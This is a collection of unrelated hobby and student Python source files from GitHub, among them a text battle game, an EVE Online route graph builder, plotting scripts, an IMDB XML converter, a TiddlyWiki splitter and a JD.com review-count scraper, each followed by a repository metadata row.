class Meta:
verbose_name = 'Автомобиль'
verbose_name_plural = 'Автомобили'
owner = models.ForeignKey(User, verbose_name='Хозяин автомобиля', on_delete=models.CASCADE,
related_name='uesr_owner')
user = models.ForeignKey(User, verbose_name='Взял в аренду', on_delete=models.CASCADE, related_name='car_to_user',
blank=True, null=True)
year = models.IntegerField(verbose_name='год создания', default=0)
name = models.CharField(verbose_name='Имя машины', max_length=255)
date = models.DateTimeField('Дата добавления машины в систему', auto_now_add=True)
| Hooliganka/verification_task | server/src/cars/models.py | models.py | py | 837 | python | en | code | 0 | github-code | 13 |
14760067692 | from argparse import ArgumentParser
import sys
import curses
from time import sleep
import tempfile
import os
from math import factorial
import random
from random import randint
class Player:
"""
A Player explores a Maze. While exploring the maze their hunger goes down.
Occasionally they may find an enemy that they must battle or run from.
Players have skills they can use to traverse the maze easier.
Attributes:
name (str): Represents the player
health (float): How much damage the player can take. Die at 0.
maxHealth (float): Cap of HP
attack (float): How much damage the player does.
hunger (float): How full the player is. 0 hunger is starving.
Starving players deal reduced damage and take 1
damage a turn
battlesFought (int):How many battles the player has fought
battlesWon (int): How many battles the player has won
treasureFound (int):How many T cells the player has passed over
inventory (Dict): A dictionary of strings representing items.
Values are ints representing the quantity owned
abilityList (Dict): A dictionary of (str) skills the player can use
and the remaining cooldown time until a skill
can be used again. Every movement the player
makes reduces the cooldown (Value) by one. Rest
reduces the cooldown by 5.
"""
def __init__(self,name,health,attack,hunger):
"""
Initializes a new Player object
Parameters:
name (str): name of the new player
health (float): HP of the new player
maxHealth (float): maxHP of the new player
weapondmg (float): Attack damage of the player
hunger (float): How full the player is
maxHunger (float): Max hunger of the player
starve (boolean): Is the player at 0 hunger?
Side effects: Initializes a new Player object
"""
self.abilityList = {"break": 0, "jump": 0}
self.inventory = {"map": 0, "sword": {"equip": attack, "unequip": [] },
"armor" : {"equip": ("tunic", 0, 0, 5), "unequip": []}, "small core": 0, "medium core":0
, "large core": 0}
self.name = name
self.health = health
self.maxhealth = health
self.attack = attack
self.hunger = hunger
self.maxhunger = hunger
self.speed = 70
self.starve = False
class Enemy:
"""
Nelson
Brief Description: So there has been built an Enemy class that stores 3
methods that we will be using such as the __init__ method that will
initialize the monsters_name, monsters_type, monsters_health,
speed and attack and the maxhealth of the enemy.
We will be setting this in the near future allowing during creation
These will be the attributes being used
Attributes:
name (str) - this will be the monsters name
type (str) - type of monster being battled
health (int) - this will be the monsters health
speed (int) - this will be the ability of the monsters speed
attack (float) - this will be the monsters attack damage.
"""
def __init__(self):
"""
Explaination:
created a list called monsters which will hold all of the monsters
that we have allocated within the list and that we are going to use
within the maze.
here we are referencing the monsters_name which will then
grab a monster randomly using the randint function between 0-7
so anyone one of them from the list.
- monsters_health is then set at 100 and based on the attack
and damage the health level will increase.
- write a conditional that will determine attack or speed,
depending on whether the randomizer chose 1 or 2 as the monster
to fight the player.
"""
monsters = ["Zombie", "Kobold", "Orc", "Goblin",\
"Skeleton", "Ghoul", "Lizardman", "Spectre"]
self.name = monsters[randint(0,7)]
montype = random.choice([1,1,1,1,1,1,1,1,1,2,2,2,3,3,3,4,4,5])
if montype == 1:
self.attack = randint(40,60)
self.speed = randint(30,50)
self.name = "Frail " + self.name
elif montype == 2:
self.attack = randint(50,65)
self.speed = randint(40,55)
self.name = "Haggard " + self.name
elif montype == 3:
self.attack = randint(60,75)
self.speed = randint(50,70)
self.name = "Skilled " + self.name
elif montype == 4:
self.attack = randint(75,95)
self.speed = randint(55,60)
self.name = "Elite " + self.name
else:
self.attack = randint(80,100)
self.speed = randint(60,70)
self.name = "Ancient " + self.name
self.health = factorial(montype) * 5 + 100
#balance
self.attack /= 2
if "Zombie" in self.name:
self.health *= .9
self.attack += 3
self.speed -= 30
elif "Kobold" in self.name:
self.health *= .7
self.speed += 5
self.attack += 7
elif "Skeleton" in self.name:
self.health *= .6
self.attack -= 3
self.speed += 12
elif "Orc" in self.name:
self.health *= .4
self.attack -= 7
self.speed += 5
elif "Goblin" in self.name:
self.health *= 1.1
self.attack += 5
elif "Lizard" in self.name:
self.speed += 8
self.attack *= 1.10
elif "Spectre" in self.name:
self.speed += 20
self.attack *= 1.8
self.health -= 30
else:
self.speed -= 30
def __repr__(self):
return self.name
def strike(entity1,entity2):
"""TENTATIVE VERSION
Entity1 attacks entity2 and calcualtes remaining hp
Args: entity1 (Player or Enemy)
entity2 (Player or Enemy)
Side effect: Lowers entity2 hp if an attack lands through them
"""
baseAccuracy = .7
critChance = 3
critDmg = 1
baseAccuracy += int((entity1.speed - entity2.speed)/4) / 100
if entity1.speed - entity2.speed > 0:
critChance += int((entity1.speed - entity2.speed)/5)
if randint(0,100) < critChance:
print(f"{entity1} sees a weak point in {entity2}")
critDmg = 1.5
if randint(0,100) <= baseAccuracy * 100:#accuracy roll
low = int(entity1.attack*.9)
high = int(entity1.attack*1.1)
damage = critDmg * randint(low,high)
entity2.health -= damage
print(f"{entity1} hit {entity2} for {damage} damage")
else: print(f"{entity1.name} missed")
def battle_monsters(player, monster):
"""
Args:
player (Player) - this will be the player attacking the monster
the monster.
monster (Enemy) - this will be monster attacking the player
Brief Description:
here we are making a conditional that will determine who has won the battle.
the first criteria would be if the player has no health and the monsters
health is greater than the plyaer the monster has won the match. otherwise
the monster has won. if the player and monsters health has reached a limit
of 0, then that means that there has been a draw and nobody has won.
maybe there could be a rematch.
"""
battleEnd = False
while not battleEnd:
playerFaster = player.speed >= monster.speed
if playerFaster:
if player.health <= 0 and monster.health > player.health:
print(f"{monster.name} has won the battle against {player.name}!")
battleEnd = True
elif(monster.health <= 0 and player.health > monster.health):
print(f"{player.name} won and {monster.name} has been defeated!")
battleEnd = True
elif(player.health <= 0 and monster.health <= 0):
print(f"{player.name} and {monster.name} have slain each other!")
battleEnd = True
if not battleEnd:
strike(player,monster)
sleep(.2)
if player.health <= 0 and monster.health > player.health:
print(f"{monster.name} has won the battle against {player.name}!")
battleEnd = True
elif(monster.health <= 0 and player.health > monster.health):
print(f"{player.name} won and {monster.name} has been defeated!")
battleEnd = True
elif(player.health <= 0 and monster.health <= 0):
print(f"{player.name} and {monster.name} have slain each other!")
battleEnd = True
if not battleEnd:
strike(monster,player)
sleep(.2)
else:
if player.health <= 0 and monster.health > player.health:
print(f"{monster.name} has won the battle against {player.name}!")
if isinstance(player,Player):
player.battlesWon += 1
player.battlesFought += 1
battleEnd = True
elif(monster.health <= 0 and player.health \
> monster.health):
print(f"{player.name} won and {monster.name} has been defeated!")
if isinstance(player,Player):
player.battlesWon += 1
player.battlesFought += 1
battleEnd = True
elif(player.health <= 0 and monster.health <= 0):#should never get here
print(f"{player.name} and {monster.name} have slain each other!")
battleEnd = True
if not battleEnd:
strike(monster,player)
sleep(.2)
if player.health <= 0 and monster.health > player.health:
print(f"{monster.name} has won the battle against {player.name}!")
battleEnd = True
elif(monster.health <= 0 and player.health \
> monster.health):
print(f"{player.name} won and {monster.name} has been defeated!")
if isinstance(player,Player):
player.battlesWon += 1
player.battlesFought += 1
battleEnd = True
elif(player.health <= 0 and monster.health <= 0):
print(f"{player.name} and {monster.name} have slain each other!")
battleEnd = True
if not battleEnd:
strike(player,monster)
sleep(.2)
enemy1 = Enemy()
enemy2 = Enemy()
player = Player("Nick",200,50,40)
print(f"{enemy1} has {enemy1.health}, {enemy2} has {enemy2.health}")
battle_monsters(player,enemy2)
print(f"{enemy1} has {enemy1.health}, {enemy2} has {enemy2.health}")
| NKoyfish/DungeonCrawl | sampleBattle.py | sampleBattle.py | py | 11,239 | python | en | code | 2 | github-code | 13 |
5671940541 | """
This code is released under an MIT license
"""
import networkx as nx
from esipy import App
from esipy import EsiClient
import config
graph = nx.DiGraph()
queue = list()# LIFO queue
esiapp = App.create(config.ESI_SWAGGER_JSON)
# init the client
esiclient = EsiClient(
cache=None,
headers={'User-Agent': config.ESI_USER_AGENT}
)
# This function gets all of the adjacent systems withing given max_depth (# of jumps) starting with current_location
# Go through all stargates in the system and get their destinations. Add all of them in a queue
# When done looping through stargates, pop current location node, you done here
# Recursively call function to work with next queue element in LIFO manner
# The function should stop when you start going out of given range
def build_graph(root, current_location, max_depth):
if len(queue) == 0:
return
longest_depth = nx.dag_longest_path_length(graph, root)
if longest_depth > max_depth:
path = nx.dag_longest_path(graph, root)
graph.remove_node(path[-1])
return
char_system_info_req = esiapp.op['get_universe_systems_system_id'](system_id=current_location)
char_system_info = esiclient.request(char_system_info_req).data
system_stargates = char_system_info['stargates']
for stargate in system_stargates:
char_system_stargate = esiapp.op['get_universe_stargates_stargate_id'](stargate_id=stargate)
char_system_stargate = esiclient.request(char_system_stargate).data
stargate_destination = str(char_system_stargate['destination']['system_id'])
nodes = list(graph.nodes)
# We want to avoid cycles if we want to use dag_longest_path_length, so we want to work with destination that
# are not in the graph yet
if(stargate_destination not in nodes):
print('{} -> {}'.format(current_location, stargate_destination))
graph.add_edge(current_location, stargate_destination)
longest_depth = nx.dag_longest_path_length(graph, root)
if longest_depth > max_depth:
path = nx.dag_longest_path(graph, root)
graph.remove_node(path[-1])
return
else:
queue.append(stargate_destination)
queue.pop(0)
longest_depth = nx.dag_longest_path_length(graph, root)
print(longest_depth)
if longest_depth > max_depth:
path = nx.dag_longest_path(graph, root)
graph.remove_node(path[-1])
return
stargate_destination = queue[0]
build_graph(root, stargate_destination, max_depth)
def build_graph_wrapper(char_location='30002267', num_of_jumps=1):
# Current location of Kaleb Plaude
queue.append(char_location)
graph.add_node(char_location)
build_graph(char_location, char_location, num_of_jumps)
# Gives you graph max depth
depth = nx.shortest_path_length(graph, char_location)
longest_depth = max(depth.values())
print("Total depth: {}".format(longest_depth))
return graph
build_graph_wrapper()
#nx.draw(build_graph_wrapper(), with_labels=True)
#plt.show() | alexander94dmitriev/EveCanaryApp | network_remote.py | network_remote.py | py | 3,086 | python | en | code | 1 | github-code | 13 |
18068165132 | import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((socket.gethostname(), 1025))
s.listen(5)
while True:
clt_soc, clt_add = s.accept()
print(f"Connection to {clt_add} established")
clt_soc.send(bytes("Socket Programming", "utf-8"))
clt_soc.close()
| kumarjeetray/Python_Programs | Socket Programming/SET II/SERVER2.py | SERVER2.py | py | 299 | python | en | code | 0 | github-code | 13 |
44340453635 | # -*- coding: utf-8 -*-
"""
Created on Fri Jan 06 06:11:42 2017
@author: Yunho
"""
from ggplot import *
import pandas as pd
# Adding a Title
ggplot(mpg, aes(x='cty', y='hwy')) + \
geom_point() + \
ggtitle("City vs. Highway Miles per Gallon")
# Adding Labels
ggplot(mpg, aes(x='cty')) + \
geom_histogram() + \
xlab("City MPG (Miles per Gallon)") + \
ylab("# of Obs")
# Adjusting Shapes
ggplot(mpg, aes(x='cty', y='hwy', shape='trans')) + geom_point()
# Area Chart
ggplot(meat, aes(x='date', y='beef')) + \
geom_area() + \
scale_x_date(labels='%Y')
# Bar Chart
ggplot(mtcars, aes(x='factor(cyl)', fill='factor(gear)')) + geom_bar()
# Boxplots
ggplot(mtcars, aes(x='factor(cyl)', y='mpg')) + geom_boxplot()
# Color Palettes
ggplot(diamonds, aes(x='carat', y='price', color='clarity')) + \
geom_point() + \
scale_color_brewer()
# Faceting Basics
df = pd.melt(meat, id_vars="date")
ggplot(diamonds, aes(x='carat', y='price', color='cut')) + \
geom_point() + \
facet_grid("clarity", "color")
ggplot(diamonds, aes(x='carat', y='price')) + \
stat_smooth(method='loess') + \
facet_grid("clarity", "cut")
# Scatter Plot
ggplot(chopsticks, aes(x='individual', y='food_pinching_effeciency')) + geom_point()
# Smoothed Line Chart
ggplot(meat, aes(x='date', y='beef')) + \
geom_point() + \
stat_smooth(ma=12, color='coral')
| yunho0130/Python_Lectures | 2018_02_SMU_Lecture_Slide/ch10/code/ggplot_jupyter.py | ggplot_jupyter.py | py | 1,391 | python | en | code | 225 | github-code | 13 |
17427571218 | """
def splitRope(RemainingLength,possibleSplits,cuts,combinations):
if ( RemainingLength < 0 ) or len([x for x in possibleSplits if x <= RemainingLength]) == 0 :
del cuts[-1]
return combinations,cuts
for splitAt in possibleSplits:
if RemainingLength - splitAt == 0:
cuts.append(splitAt)
combinations.add(tuple(cuts))
cuts=[]
elif RemainingLength - splitAt >= 0:
cuts.append(splitAt)
combinations,cuts = splitRope(RemainingLength = (RemainingLength - splitAt), possibleSplits=possibleSplits, cuts=cuts,combinations=combinations )
return combinations,[]
if __name__ == '__main__':
TotalLength = int(input('Enter the total length of the rope: '))
possibleSplits = list(map(int,input("Enter 3 numbers(Comma seperated) for splitting the rope: ").split(',')))
cuts=list()
combinations=set()
combinations,cuts = splitRope(RemainingLength=TotalLength, possibleSplits=possibleSplits, cuts=cuts, combinations=combinations)
print(combinations)
"""
def maxPieces(n, a, b, c):
result = 0
if n == 0:
return 0
if n < 0:
return -1
result = max(maxPieces(n-a,a,b,c),maxPieces(n-b,a,b,c),maxPieces(n-c,a,b,c))
if result < 0:
return -1
return result + 1
if __name__ == "__main__":
TotalLength = int(input('Enter the total length of the rope: '))
a,b,c=map(int,input("Enter 3 numbers(Comma seperated) for splitting the rope: ").split(','))
print(maxPieces(TotalLength,a,b,c)) | vigneshSr91/MyProjects | Exercise37-RopeCuttingRecursive.py | Exercise37-RopeCuttingRecursive.py | py | 1,556 | python | en | code | 0 | github-code | 13 |
3583607273 | # 전기버스 2
# time : 40m
# idea
'''
현재 가진 배터리로 갈 수 있는 모든 특정 정류소에서 충전하는 경우 모든 것을 다 고려 후, 가지치기 진행하기
→ DFS + charge_cnt 기준으로 가지치기
'''
def charge_times(s, cnt): # 최소 충전 횟수를 찾는 함수
global min_cnt # 현재까지의 최소 충전 횟수
if cnt >= min_cnt: # 가치지기 : 이미 현재의 최소를 넘은 경우
return # 해당 재귀를 종료
if s >= n - 1: # 종점에 도착했다면 (현재 위치 s가 종점 인덱스 이상)
if cnt < min_cnt: # min_cnt 업데이트
min_cnt = cnt
return min_cnt
avail = charge[s] # 아직 진행 중이라면 해당 위치에서의 연료를 확인하고
for i in range(1, avail + 1): # 그 연료만큼 갈 수 있는 모든 정류장들에 대하여
charge_times(s + i, cnt + 1) # 그 정류장을 시작점으로 갈 수 있는 정류장들 탐색을 재귀로 진행
t = int(input())
for tc in range(1, t + 1):
info = list(map(int, input().split()))
n = info[0] # 정류장 개수
charge = info[1:] # 정류장마다 연료의 양 정보
min_cnt = len(charge) # 초기 최소 충전수
charge_times(0, 0) # 0 인덱스에서 출발, 아직 충전횟수는 0으로 함수를 시작
print(f'#{tc} {min_cnt - 1}') | eondo/Algorithm | 분할정복&백트래킹/S_5208_전기버스2.py | S_5208_전기버스2.py | py | 1,444 | python | ko | code | 0 | github-code | 13 |
18091839822 | #!/usr/bin/python
######################################################################
# Name: ALaDyn_plot_utilities_Energy_Density.py
# Author: F.Mira
# Date: 2016-05-25
# Purpose: it is a module of: ALaDyn_plot_sections - plots energy density
# Source: python
#####################################################################
### loading shell commands
import os, os.path
import numpy as np
###>>>
# home_path = os.path.expanduser('~')
# sys.path.append(os.path.join(home_path,'Codes/ALaDyn_Code/tools-ALaDyn/ALaDyn_Pythons'))
###>>>
from read_ALaDyn_bin import *
from utilities_1 import *
### --- ###
#- plot Sections
def plot_energy_density_sections(path,frame,Energy_density_min,Energy_density_max,isolines,celltocut,sliceposition_x,sliceposition_y,sliceposition_z,magnification_fig,savedata):
s='%2.2i'%frame #conversion to 2-character-long-string
file_name = 'Elenout'+s+'.bin'
matrix3, x,y,z = read_ALaDyn_bin(path,file_name,'grid')
#- cut & sign
matrix3 = np.abs( matrix3 )
print('Energy_density_max >>', np.max([np.max(matrix3)]))
print('Energy_density_min >>', np.min([np.min(matrix3)]))
#---cut edges---#
if celltocut > 0:
matrix3 = matrix3[:,celltocut:-celltocut,celltocut:-celltocut]
y = y[celltocut:-celltocut]
z = z[celltocut:-celltocut]
p = matrix3.shape
x2=p[0]/2+sliceposition_x; y2=p[1]/2+sliceposition_y; z2=p[2]/2+sliceposition_z;
sizeX, sizeZ = figure_dimension_inch(x,y,z,magnification_fig)
levs_lin = np.linspace( Energy_density_min , Energy_density_max ,isolines)
levs_log = np.logspace(log10(Energy_density_min),log10(Energy_density_max),isolines)
#--------------------#
#--- Linear plots ---#
#--------------------#
#- Plot Elenout -#
fig = figure(1, figsize=(sizeX, sizeZ))
contourf(x,y,matrix3[:,:,z2].T,levs_lin, linewidths = 0.00001)
axis('tight')
name_output = 'Energy_density_XY_lin_'+s+'.png'
savefig( os.path.join(path,'plots','Energy_density',name_output) )
close(fig)
fig = figure(1, figsize=(sizeX, sizeZ))
contourf(x,z,matrix3[:,y2,:].T,levs_lin, linewidths = 0.00001)
axis('tight')
name_output = 'Energy_density_XZ_lin_'+s+'.png'
fig.savefig( os.path.join(path,'plots','Energy_density',name_output) )
close(fig)
#--------------------#
#--- Log plots ---#
#--------------------#
#- Plot Elenout -#
fig = figure(1, figsize=(sizeX, sizeZ))
contourf(x,y,matrix3[:,:,z2].T, levs_log, norm=colors.LogNorm())
axis('tight')
name_output = 'Energy_density_XY_log_'+s+'.png'
savefig( os.path.join(path,'plots','Energy_density',name_output) )
close(fig)
fig = figure(1, figsize=(sizeX, sizeZ))
contourf(x,z,matrix3[:,y2,:].T,levs_log, norm=colors.LogNorm())
axis('tight')
name_output = 'Energy_density_XZ_log_'+s+'.png'
fig.savefig( os.path.join(path,'plots','Energy_density',name_output) )
close(fig)
# fig = figure(1, figsize=(sizeZ, sizeZ))
# contourf(y,z,matrix[x2,:,:].T, levs_log, norm=colors.LogNorm())
# axis('tight')
# name_output = 'rho_Bunch_YZ_log_'+s+'.png'
# fig.savefig( os.path.join(path,'plots','rho',name_output) )
# close(fig)
#----- Save density sections data -----#
if (savedata == 'True'):
print('saving Energy_density data')
Energy_density = matrix3
p = Energy_density.shape
x2=p[0]/2+sliceposition_x; y2=p[1]/2+sliceposition_y; z2=p[2]/2+sliceposition_z;
np.savetxt( os.path.join(path,'data','Energy_density',('Energy_Density'+('%2.2i'%frame)+'.dat')),Energy_density[:,:,z2].T,fmt='%15.14e')
# np.savetxt( 'rho_section_'+('%2.2i'%frame)+'.dat' ,rho[:,:,z2].T,fmt='%15.14e')
# np.savetxt( 'rho_b_section_'+('%2.2i'%frame)+'.dat' ,rho_b[:,:,z2].T,fmt='%15.14e')
| ALaDyn/tools-ALaDyn | pythons/utility_energy_density.py | utility_energy_density.py | py | 3,693 | python | en | code | 6 | github-code | 13 |
27839014475 | import pandas as pd
import xml.etree.ElementTree as ET
import sys
from random import *
import importlib
# load all data in Panda dataframes
# titles information
tittleInfo = pd.read_csv( "tittle_basics1.tsv", sep='\t' ) #100k
tittleCrew = pd.read_csv( "tittle_crew1.tsv", sep='\t' )
tittleRatings = pd.read_csv( "tittle_ratings.tsv", sep='\t')
tittleEpisode = pd.read_csv( "tittle_episode1.tsv", sep='\t')
tittlePrinciple = pd.read_csv("tittle_principles1.tsv", sep='\t')
nameBasics = pd.read_csv("name_basics1.tsv",sep='\t')
tittleMovies = tittleInfo.loc[ tittleInfo['titleType'] == 'movie'] #7k
tittleSeries = tittleInfo.loc[ tittleInfo['titleType'] == 'tvSeries'] #4k
tittleEP = tittleInfo.loc[ tittleInfo['titleType'] == 'tvEpisode']
tittleInfo.runtimeMinutes.replace(to_replace="\\N",value="120",inplace=True)
root = ET.Element("IMDB")
Movies = ET.SubElement(root,"Movies")
#DF.empty , df[ df.col == 'val'] //for searching
for i in range(0,10):
movie = ET.SubElement(Movies,"Movie")
ptitle = tittleMovies.primaryTitle.iloc[i] #string
genres = tittleMovies.genres.iloc[i] #string maybe aaray also
year = tittleMovies.startYear.iloc[i] #int
runtime = tittleMovies.runtimeMinutes.iloc[i] #string
tconst = tittleMovies.tconst.iloc[i] #string
#temp Dataframe for getiing ratings
rateDF = tittleRatings[ tittleRatings['tconst']== tconst]
rating = " "
if(rateDF.empty==False):
rating = rateDF.averageRating.iloc[0] #np.float
#generate xml
Title = ET.SubElement(movie,"Title")
Title.text = ptitle
Crew = ET.SubElement(movie,"Crew")
Director = ET.SubElement(Crew,"Director")
#get director info
dirDF = tittleCrew[ tittleCrew['tconst']== tconst]
if(dirDF.empty==False):
dirIDList = (dirDF.directors.iloc[0]).split(',')
dirID = dirIDList[0] #TODO one or more Directors
Director.text = str(dirID)
else :
Director.text = ""
#add casts
Stars = ET.SubElement(Crew,"Cast")
castDF = tittlePrinciple[tittlePrinciple['tconst']==tconst]
if(castDF.empty==False):
castIDList = (castDF.principalCast.iloc[0]).split(',')
for castID in castIDList:
castIDT = ET.SubElement(Stars,"CelebRef")
castIDT.text = str(castID)
#add genre
Genre = ET.SubElement(movie,"Genres")
genreList = genres.split(',')
for gtext in genreList :
genre = ET.SubElement(Genre,"Genre")
genre.text = gtext
Desc = ET.SubElement(movie,"Description")
Year = ET.SubElement(Desc,"Year")
Year.text = str(year)
rtime = ET.SubElement(Desc,"RunTime")
rtime.text = runtime
Rate = ET.SubElement(movie,"Ratings")
Rate.text = str(rating)
TVshows = ET.SubElement(root,'TVshows')
#DF.empty , df[ df.col == 'val'] //for searching
for i in range(0,100):
TVshow = ET.SubElement(TVshows,"TVshow")
ptitle = tittleSeries.primaryTitle.iloc[i] #string
genres = tittleSeries.genres.iloc[i] #string maybe aaray also
year = tittleSeries.startYear.iloc[i] #int
runtime = tittleSeries.runtimeMinutes.iloc[i] #string
tconst = tittleSeries.tconst.iloc[i] #string
TVshow.set("TvShowID",str(tconst))
#temp Dataframe for getiing ratings
rateDF = tittleRatings[ tittleRatings['tconst']== tconst]
rating = " "
if(rateDF.empty==False):
rating = rateDF.averageRating.iloc[0] #np.float
#generate xml
Title = ET.SubElement(TVshow,"Title")
Title.text = str(ptitle)
Crew = ET.SubElement(TVshow,"Crew")
Director = ET.SubElement(Crew,"Director")
#get director info
dirDF = tittleCrew[ tittleCrew['tconst']== tconst]
if(dirDF.empty==False):
dirIDList = (dirDF.directors.iloc[0]).split(',')
dirID = dirIDList[0] #TODO one or more Directors
Director.text = str(dirID)
else :
Director.text = ""
#add casts
Stars = ET.SubElement(Crew,"Cast")
castDF = tittlePrinciple[tittlePrinciple['tconst']==tconst]
if(castDF.empty==False):
castIDList = (castDF.principalCast.iloc[0]).split(',');
for castID in castIDList:
castIDT = ET.SubElement(Stars,"CelebRef")
castIDT.text = str(castID)
#add genre
Genre = ET.SubElement(TVshow,"Genres")
genreList = genres.split(',')
for gtext in genreList :
genre = ET.SubElement(Genre,"Genre")
genre.text = str(gtext)
Desc = ET.SubElement(TVshow,"Description")
Year = ET.SubElement(Desc,"Year")
Year.text = str(year)
rtime = ET.SubElement(Desc,"RunTime")
rtime.text = str(runtime)
#seasons
Seasons = ET.SubElement(TVshow,"Seasons")
numSeason = ET.SubElement(Seasons,"Number_of_Seasons")
#episodes
tittleEpisode.seasonNumber.replace(to_replace="\\N",value="0",inplace=True)
#all eps of series
epDF = tittleEpisode[tittleEpisode['parentTconst']==tconst]
numSeason.text = str(epDF.seasonNumber.unique().size)
if(epDF.empty==False):
epDF.sort_values('seasonNumber',inplace=True)
sList = epDF.seasonNumber.unique().tolist()
sList= map(int,sList)
for sL in sList:
sDF = epDF[epDF['seasonNumber']==str(sL)]
Season = ET.SubElement(Seasons,"Season")
numEp = ET.SubElement(Season,"No_of_Episodes")
numEp.text = str(sDF.shape[0])
Epi = ET.SubElement(Season,"Episodes")
yearS = " "
for idx in range(0,sDF.shape[0]):
etconst = sDF.tconst.iloc[idx]
EpiDF = tittleEP[tittleEP['tconst']==etconst]
episodeTag = ET.SubElement(Epi,"Episode")
if(EpiDF.empty==False):
epText = str(EpiDF.primaryTitle.iloc[0])
episodeTag.text = str(EpiDF.primaryTitle.iloc[0])
i = randint(1,10)
j = randint(1,10)
rate = str(i)+"."+str(j)
ratTag = ET.SubElement(Epi,"Rating")
ratTag.text = str(rate)
yearS = EpiDF.startYear.iloc[0]
Syear = ET.SubElement(Season,"Year")
Syear.text = str(yearS)
i = randint(1,10)
j = randint(1,10)
Srate = str(i)+"."+str(j)
SratTag = ET.SubElement(Season,"Rating")
SratTag.text = str(Srate)
#rating for seasom
Rate = ET.SubElement(TVshow,"Ratings")
Rate.text = str(rating)
Celebs = ET.SubElement(root,"Celebs")
for i in range(0,10000):
Celeb = ET.SubElement(Celebs,"Celeb")
nconst = nameBasics.nconst.iloc[i]
Celeb.set("CelebID",str(nconst))
name = ET.SubElement(Celeb,"Name")
name.text = str(nameBasics.primaryName.iloc[i])
BirthYear = ET.SubElement(Celeb,"BirthYear")
BirthYear.text = str(nameBasics.birthYear.iloc[i])
primProf = ET.SubElement(Celeb,"PrimaryProfession")
primProf.text = str(nameBasics.primaryProfession.iloc[i])
knownFor = ET.SubElement(Celeb,"KnownFor")
knownForTitles = nameBasics.knownForTitles.iloc[0]
for el in knownForTitles.split(',') :
tt = ET.SubElement(knownFor,"TitleRef")
tt.text = str(el)
tree = ET.ElementTree(root)
tree.write("GenIMDBdata.xml")
| akhiln28/ontology_assignment1 | DataExtract.py | DataExtract.py | py | 6,500 | python | en | code | 0 | github-code | 13 |
254256141 | #!/usr/bin/env python3
"""
This script splits exported tiddlers.md into multiple Markdown files in a "tiddlers" folder.
Usage: python split-tiddlers.py
"""
# The name of the multiple tiddlers Markdown file
in_file = 'tiddlers.md'
# The name of the folder where the output is stored
out_folder = 'tiddlers'
import os
import re
# Regular expression to find the "title" field in the YAML front matter
rx_title = re.compile('title: [\'"](.+)[\'"]', re.IGNORECASE | re.MULTILINE)
# Regular expression for characters that are illegal or unwise to use in file names
rx_illegal_file_chars = re.compile("[\[\]#<>:*?|^/\"\\\t\r\n]")
# Regular expression for illegal or unwise chars at the beginning or end of file names
rx_strip = re.compile("(^[\.\s]+|[\s\.]+$)")
# Regular expression for double spaces that are the result of replacing multiple illegal characters with spaces
rx_double_spaces = re.compile(" +")
def clean_filename(title):
return rx_strip.sub("", rx_double_spaces.sub(" ", rx_illegal_file_chars.sub(" ", title)))
# Create folder
os.makedirs(out_folder, exist_ok=True)
for file in open(in_file, 'r').read().split('\\newpage'):
titleMatch = rx_title.search(file)
if titleMatch:
fileTitle = clean_filename(titleMatch.group(1))
else:
raise ValueError('Cannot find title for one of the tiddlers')
with open(os.path.join(out_folder, fileTitle) + '.md', 'w') as outfile:
outfile.write(file.strip())
outfile.close()
| cdaven/tiddlywiki-stuff | markdown-export/split-tiddlers.py | split-tiddlers.py | py | 1,480 | python | en | code | 10 | github-code | 13 |
23269638002 | # -*- coding: utf-8 -*-
"""
Created on Tue Sep 20 09:24:31 2016
http://club.jd.com/clubservice.aspx?method=GetCommentsCount&referenceIds=3243686
@author: thinkpad
"""
import asyncio
import aiohttp
import aiomysql
import pandas as pd
import datetime
import queue
async def get_count(sku_group):
global crawl_id
url_base='http://club.jd.com/clubservice.aspx?method=GetCommentsCount&referenceIds='
url=url_base+str(sku_group)
async with aiohttp.ClientSession() as session:
async with session.get(url) as response:
count_text=await response.read()
count_dict=eval(count_text)
score1_count=count_dict['CommentsCount'][0]['Score1Count']
score2_count=count_dict['CommentsCount'][0]['Score2Count']
score3_count=count_dict['CommentsCount'][0]['Score3Count']
score4_count=count_dict['CommentsCount'][0]['Score4Count']
score5_count=count_dict['CommentsCount'][0]['Score5Count']
show_count=count_dict['CommentsCount'][0]['ShowCount']
comment_count=count_dict['CommentsCount'][0]['CommentCount']
average_score=count_dict['CommentsCount'][0]['AverageScore']
good_count=count_dict['CommentsCount'][0]['GoodCount']
good_rate=count_dict['CommentsCount'][0]['GoodRate']
good_rate_show=count_dict['CommentsCount'][0]['GoodRateShow']
good_rate_style=count_dict['CommentsCount'][0]['GoodRateStyle']
general_count=count_dict['CommentsCount'][0]['GeneralCount']
general_rate=count_dict['CommentsCount'][0]['GeneralRate']
general_rate_show=count_dict['CommentsCount'][0]['GeneralRateShow']
general_rate_style=count_dict['CommentsCount'][0]['GeneralRateStyle']
poor_count=count_dict['CommentsCount'][0]['PoorCount']
poor_rate=count_dict['CommentsCount'][0]['PoorRate']
poor_rate_show=count_dict['CommentsCount'][0]['PoorRateShow']
poor_rate_style=count_dict['CommentsCount'][0]['PoorRateStyle']
crawl_date=datetime.date.today()
now=datetime.datetime.now()
crawl_time=now.strftime('%H:%M:%S')
count=[crawl_id,sku_group,score1_count,score2_count,score3_count,
score4_count,score5_count,show_count,comment_count,average_score,
good_count,good_rate,good_rate_show,good_rate_style,
general_count,general_rate,general_rate_show,general_rate_style,
poor_count,poor_rate,poor_rate_show,poor_rate_style,
crawl_date,crawl_time]
conn=await aiomysql.connect(host='127.0.0.1',user='root',password='1111',
db='customer')
cur=await conn.cursor()
sql='insert into comment_count_jd(crawl_id,sku_group,score1_count,\
score2_count,score3_count,score4_count,score5_count,show_count,\
comment_count,average_score,good_count,good_rate,good_rate_show,\
good_rate_style,general_count,general_rate,general_rate_show,\
general_rate_style,poor_count,poor_rate,poor_rate_show,poor_rate_style,\
crawl_date,crawl_time) values(%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,\
%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s)'
await cur.execute(sql,count)
await conn.commit()
await cur.close()
conn.close()
if __name__=='__main__':
crawl_id=input('请输入爬取编号:')
sku_group_queue=queue.Queue()
sku_group_dt=pd.read_csv('C:/Users/Administrator/Documents/Temp/sku_group.csv',dtype=str)
for sku_group in sku_group_dt['sku_group']:
sku_group_queue.put(sku_group)
while sku_group_queue.qsize()>0:
loop=asyncio.get_event_loop()
tasks=[]
for n in range(0,10):
task=asyncio.ensure_future(get_count(sku_group_queue.get()))
tasks.append(task)
loop.run_until_complete(asyncio.wait(tasks))
